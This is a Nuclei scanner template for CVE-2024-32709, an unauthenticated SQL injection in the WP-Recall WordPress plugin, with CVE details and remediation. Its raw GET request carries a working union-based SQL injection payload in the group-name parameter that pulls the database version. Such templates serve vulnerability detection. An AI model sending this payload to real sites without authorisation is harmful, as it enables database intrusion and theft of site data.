id: CVE-2024-32709 info: name: WP-Recall <= 16.26.5 - SQL Injection author: securityforeveryone severity: critical description: | The WP-Recall Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: Fixed in 16.26.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-32709 - https://github.com/truonghuuphuc/CVE-2024-32709-Poc - https://patchstack.com/database/vulnerability/wp-recall/wordpress-wp-recall-plugin-16-26-5-sql-injection-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2024-32709 cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.0866 cpe: cpe:2.3:a:plechevandrey:wp-recall:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/wp-recall/" product: wp-recall vendor: plechevandrey tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli variables: num: "999999999" http: - raw: - | GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '{{md5(num)}}' - type: status status: - 200 # digest: 4a0a004730450221008f482cbcf6fc8765ed60782891f84d16cdbb13ed81ebef9a2321f2599ab5d74702201f0167cc8ab3dd09284cbce08559d9db6e41961a71f55f14f6920847f5f1d79b:922c64590222798bb761d5b6d8e72950